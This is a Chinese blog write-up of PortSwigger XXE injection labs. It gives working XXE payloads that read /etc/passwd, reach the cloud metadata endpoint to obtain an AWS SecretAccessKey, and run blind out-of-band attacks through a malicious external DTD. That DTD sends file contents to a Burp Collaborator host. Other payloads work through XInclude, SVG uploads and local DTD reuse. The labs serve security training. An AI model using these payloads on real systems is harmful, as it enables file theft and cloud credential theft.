burp靶场--XXE注入

已于 2024-01-18 20:06:57 修改
阅读量1.1k 收藏 27
点赞数 21
分类专栏: WEB安全 burp靶场 文章标签: 安全 web安全 网络
于 2024-01-16 20:16:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33168924/article/details/135613870
版权

XML 外部实体 (XXE) 注入

1. 什么是xxe漏洞:

https://portswigger.net/web-security/xxe#what-is-xml-external-entity-injection
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。

在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。

实验1:xxe读取文件:

Lab: Exploiting XXE using external entities to retrieve files
进入靶场,点击功能,进入burp代理历史查看流量包:
在这里插入图片描述
数据包发送到repeater:
测试xxe漏洞:

访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
将数字替换productId为对外部实体的引用:&xxe; 响应应包含“Invalid product ID”,后跟文件内容/etc/passwd。

在这里插入图片描述

实验2:利用xxe造成ssrf:

Lab: Exploiting XXE to perform SSRF attacks

访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
将数字替换productId为对外部实体的引用:&xxe;。响应应包含“无效的产品 ID:”,后跟来自元数据端点的响应,该响应最初是文件夹名称。
迭代更新 DTD 中的 URL 以探索 API,直到到达/latest/meta-data/iam/security-credentials/admin。这应该返回包含SecretAccessKey.

在这里插入图片描述

在这里插入图片描述
逐步添加169.254.169.254主机泄露的web目录到xml文档,最终发现泄露了aws云的SecretAccessKey,可以用相关工具
访问云服务:
在这里插入图片描述

实验3:带外交互的XXE盲注:

访问产品页面,单击“检查库存”并在Burp Suite Professional中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck。右键单击并选择“插入 Collaborator 负载”以在指示的位置插入 Burp Collaborator 子域:

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
实际:burp collaborator生成:if1tvfuvgii5ksgx9f9wr7t43v9mxdl2.oastify.com
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://if1tvfuvgii5ksgx9f9wr7t43v9mxdl2.oastify.com"> ]>

将数字替换productId为对外部实体的引用:

&xxe;
转到“collaborator”选项卡,然后单击“Poll now”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试。您应该会看到应用程序根据负载结果发起的一些 DNS 和 HTTP 交互。

进入靶场,查看到检查库存功能,有提交xml请求的流量:
在这里插入图片描述
修改数据包,重放:
在这里插入图片描述
在这里插入图片描述

实验4:通过 XML 参数实体进行带外交互的XXE盲注:

访问产品页面,单击“检查库存”并在Burp Suite Professional中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck。右键单击并选择“插入 Collaborator 负载”以在指示的位置插入 Burp Collaborator 子域:

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
## Collaborator生成子域名:% xxe表示xml参数实体
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://lshw8i7ytlv8xvt0mimz4a67gympaiy7.oastify.com"> %xxe; ]>
转到“Collaborator”选项卡,然后单击“Poll now”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试。您应该会看到应用程序根据负载结果发起的一些 DNS 和 HTTP 交互。

将数据包发送到重放器:
在这里插入图片描述

修改xml数据:
在这里插入图片描述
在这里插入图片描述

实验5:利用恶意外部 DTD 进行 XXE盲注窃取数据

使用Burp Suite Professional,转到“协作者”选项卡。
单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。
将 Burp Collaborator 负载放入恶意 DTD 文件中:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;

#### 制作恶意的外部dtd文档:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://pf80vmu2gpickzg49m93retb329txold.oastify.com/?x=%file;'>">
%eval;
%exfil;
单击“转到漏洞利用服务器”并将恶意 DTD 文件保存在您的服务器上。单击“查看漏洞”并记下 URL。
URL: https://exploit-0a77006b049645408600598501f100f3.exploit-server.net/exploit
您需要通过添加引用恶意 DTD 的参数实体来利用股票检查器功能。首先,访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
## 将恶意的dtd url路径插入:URL: https://exploit-0a77006b049645408600598501f100f3.exploit-server.net/exploit
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a77006b049645408600598501f100f3.exploit-server.net/exploit"> %xxe;]>

返回“Collaborator ”选项卡,然后单击“Poll now”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试。
您应该会看到应用程序根据负载结果发起的一些 DNS 和 HTTP 交互。HTTP 交互可以包含文件的内容/etc/hostname。

进入靶场,抓取查看库存功能,burp抓包:
在这里插入图片描述
将制作的恶意dtd文档托管到自己可控的web服务器上:
在这里插入图片描述
在这里插入图片描述
URL: https://exploit-0a77006b049645408600598501f100f3.exploit-server.net/exploit
在这里插入图片描述
在这里插入图片描述

实验6:利用盲目 XXE 通过错误消息检索数据

单击“转到漏洞利用服务器”并将以下恶意 DTD 文件保存在您的服务器上:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
/etc/passwd导入时,此页面将读取实体 的内容file,然后尝试在文件路径中使用该实体。

单击“查看漏洞”并记下恶意 DTD 的 URL。
您需要通过添加引用恶意 DTD 的参数实体来利用股票检查器功能。首先,访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义stockCheck:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
##
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa1003e03754688803d84d101520013.exploit-server.net/exploit"> %xxe;]>
https://exploit-0aa1003e03754688803d84d101520013.exploit-server.net/exploit
您应该看到一条包含文件内容的错误消息/etc/passwd。

在这里插入图片描述
将恶意的dtd文件托管到自己控制的web服务器中:记录恶意dtd的url值:
https://exploit-0aa1003e03754688803d84d101520013.exploit-server.net/exploit
在这里插入图片描述
在这里插入图片描述

实验7:利用 XInclude 检索文件:

一些应用程序接收客户端提交的数据,将其在服务器端嵌入到 XML 文档中,然后解析该文档。当客户端提交的数据被放入后端 SOAP 请求中,然后由后端 SOAP 服务处理时,就会发生这种情况。

在这种情况下,您无法执行经典的 XXE 攻击,因为您无法控制整个 XML 文档,因此无法定义或修改元素DOCTYPE。但是,您也许可以使用XInclude它。XInclude是 XML 规范的一部分,允许从子文档构建 XML 文档。您可以XInclude在 XML 文档中的任何数据值中进行攻击,因此可以在您仅控制放入服务器端 XML 文档中的单个数据项的情况下执行攻击。

要执行XInclude攻击,您需要引用XInclude命名空间并提供您希望包含的文件的路径。例如:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

### 操作:
访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
将参数值设置productId为:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

在这里插入图片描述
在这里插入图片描述

实验8:通过图像文件上传利用 XXE

### 原理:
某些应用程序允许用户上传文件,然后在服务器端进行处理。一些常见的文件格式使用 XML 或包含 XML 子组件。基于 XML 的格式的示例包括 DOCX 等办公文档格式和 SVG 等图像格式。

例如,应用程序可能允许用户上传图像,并在上传后在服务器上处理或验证这些图像。即使应用程序期望接收 PNG 或 JPEG 等格式,正在使用的图像处理库也可能支持 SVG 图像。由于SVG格式使用XML,攻击者可以提交恶意SVG图像,从而达到XXE漏洞的隐藏攻击面。

### 操作:
创建包含以下内容的本地 SVG 图像:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
在博客文章上发表评论,并上传此图像作为头像。
/etc/hostname当您查看评论时,头像svg被解析,xml中代码执行,读取了hostname,您应该会在图像中 看到文件的内容。使用“提交解决方案”按钮提交服务器主机名的值。

创建1.svg文件:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
查看图片,图片已经显示了主机名:
在这里插入图片描述

实验9:利用 XXE 通过重新利用本地 DTD 来检索数据

访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下参数实体定义stockCheck:

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
这将导入 Yelp DTD,然后重新定义ISOamso实体,触发包含文件内容的错误消息/etc/passwd。

在这里插入图片描述
在这里插入图片描述

通过修改内容类型进行 XXE 攻击

大多数 POST 请求使用由 HTML 表单生成的默认内容类型,例如application/x-www-form-urlencoded. 某些网站期望接收这种格式的请求,但也会容忍其他内容类型,包括 XML。

例如,如果一个普通请求包含以下内容:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar
然后您可以提交以下请求,得到相同的结果:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?>bar

如果应用程序容忍消息正文中包含 XML 的请求,并将正文内容解析为 XML,那么您只需将请求重新格式化为使用 XML 格式即可到达隐藏的 XXE 攻击面。

参考:


https://mp.weixin.qq.com/s/a_AlnsHdyavDriFbnTsyRw
## paylaodallthings:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

### owasp:
https://owasp.org/www-project-web-security-testing-guide/v42/

### owasp xml注入:
https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection
0rch1d
关注
  • 21
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE漏洞(2)漏洞实战
jelly
07-07 1908
本次测试XXE主要在靶机上安装了bWAPP程序,中间有一关为XXE漏洞很好做测试了解XXE漏洞。 靶机:192.168.56.101 攻击机kali:192.168.56.1 目录 了解XXE漏洞原理 漏洞成因 怎么判断网站是否存在XXE漏洞 基本利用 XML漏洞利用 任意文件读取 有回显的xxe利用 读取特殊符号文件 没有回显读取文档的方式 内网探测 DDOS攻击 XXE漏洞防御 了解XXE漏洞原理 漏洞成因 XXE漏洞全称XML External Entity ...
burp-loader-keygen
07-10
cra ———cked 的 burpsuite_pro_v1.7.31.jar 提供给有需要的py
Burpsuite-UAScan:burpsuite插件:被动进行未授权访问扫描
05-23
Burpsuite UAScan 插件 Burpsuite插件:被动方式进行未授权访问漏洞(越权)的扫描 被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用Jaro-Winkler距离算法进行页面相似度判断,提高准确度 加入过滤器功能,用英文分号分隔可输入多个域名(xxx.xxx)作为过滤,大大提高挖洞效率 简易教程 在Release中下载插件,安装后会多出一个页面:UAScan。 进入这个页面勾选开启被动扫描,然后不用做任何操作,正常使用Burpsuite即可。 自动检测所有的流量,然后将可能存在未授权访问漏洞的URL显示到UAScan的页面中。 一般建议在登录某系统后使用,是挖掘未授权访问漏洞的利器。 目前只排除了静态文件,后续可以自定义排除规则 开发者 小迪安全团队(许少,
实战项目 2 Linux-XXE 靶场渗透测试案例详解
最新发布
m0_50572593的博客
06-21 2023
XXE(xml external entity injection) 既"xml 外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的 xml 实体内容,从而让服务器按照指定的配置进行执行,导致问题“也就是说服务端接收和解析了来自用户端的 xml 数据,而又没有做严格的安全控制,从而导致 xml 外部实体注入。造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。
burpsuite安全练兵场-服务端10】XML外部实体注入XXE注入)-9个实验(全)
01-11 8092
【BP靶场portswigger-服务端10-XML外部实体注入XXE注入)】9个实验-万文详细步骤
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1293
webug靶场过关秘籍
PortSwigger靶场(二)XXE注入
weixin_52835927的博客
10-19 196
XML是一种用于标记电子文件使其具有结构性的标记语言,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。用我自己的理解来讲就是我们输入数据其实计算机理解不了,需要我们再输入一些东西辅助计算机进行理解,标名这是什么数据,其实更像是一种数据库,只是功能上只能存数据,也更简单进行编写,方便计算机运用,xml就可以兼容几乎所有的数据,让计算机理解,具体参考本站中的这一篇文章。
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3783
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
xxe-lab-master/php_xxe;简单练习;靶场XXE;XML;
xiaochenhang的博客
08-24 632
看到这个:Accept: application/xml, text/xml。3、随便输入一个账户名和密码进行抓包 (burpsuite);xxe-lab-master.zip - 蓝奏云。这里是看一下Windows下的配置文件;也可以考虑使用其他伪协议,链接其他东西;5、看到回显,告一段落;2、搭建好环境后是这样;文件大小:1.7 M|4、进行XEE注入
我的再造学习篇Day1-XXE漏洞剖析
weixin_44866139的博客
03-21 437
一、XML、DTD、实体介绍 XML XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD文档类型定义(document type definition) 的东西控制的。 DTD用来描述...
burp-unauth-checker:burpsuite扩展程序,用于检查未经授权的漏洞
04-15
burp-unauth-checker概述自动化检测未授权访问漏洞关于该插件的实现细节,参考快速开始使用时需要勾选launchBurpUnauthChecker,建议在测试需要授权访问的功能时才开启(如网站后台)authParams.cfg:存储授权参数,...
burpsuite-1.7.30
01-30
Burpsuite-1.7.30是由Java语言编写而成,而Java自身的跨平台性,使得软件的学习和使用更加方便。Burp Suite不像其他的自动化测试工具,它需要你手工的去配置一些参数,触发一些自动化流程,然后它才会开始工作。所以...
Burpsuite-kali稳定版
12-30
1、内附安装教程、java环境,两步骤直接安装,不用配JAVA环境,不用设置...3、内含扩展插件环境,助你畅通无阻安装burp插件商店里所有插件,可以私信我交流插件使用心得 4、有这一份工具,足以满足你90%的渗透测试场景
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
02-25 5046
写在前面 这个系列开始写写XXE相关的东西,这里时第一部分,相关资料及使用靶场如下: https://www.w3schools.com/xml/ https://portswigger.net/web-security/xxe 为了更方便你检索题目且由于是国外网站,会带有一定外语及翻译,开始吧 Exploiting XXE using external entities to retrieve files(利用外部实体利用XXE来检索文件) 打开环境 是一个商店页面的模拟,先找找可疑的点吧,点进商品
入狱小技巧之木马制作——图片木马制作
qq_33168924的博客
09-07 7548
0x01 图片木马制作 0x02 简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 0x03 制作方式 A) 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass
burp靶场--xss上篇【1-15】
qq_33168924的博客
01-29 1534
跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞。XSS 允许攻击者将恶意代码注入网站,然后在访问该网站的任何人的浏览器中执行该代码。这可能允许攻击者窃取敏感信息,例如用户登录凭据,或执行其他恶意操作。XSS 攻击主要有 3 种类型:反射型 XSS:在反射型 XSS 攻击中,恶意代码嵌入到发送给受害者的链接中。当受害者点击链接时,代码就会在他们的浏览器中执行。例如,攻击者可以创建包含恶意 JavaScript 的链接,并将其通过电子邮件发送给受害者。
burp靶场--WebSockets安全漏洞
qq_33168924的博客
01-24 1522
Burp代理的HTTP历史记录选项卡中,找到WebSocket握手请求。观察请求是否没有CSRF令牌。凭据:carlos: fj83hbdbohtky68riu8b。右键单击握手请求并选择"复制URL"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值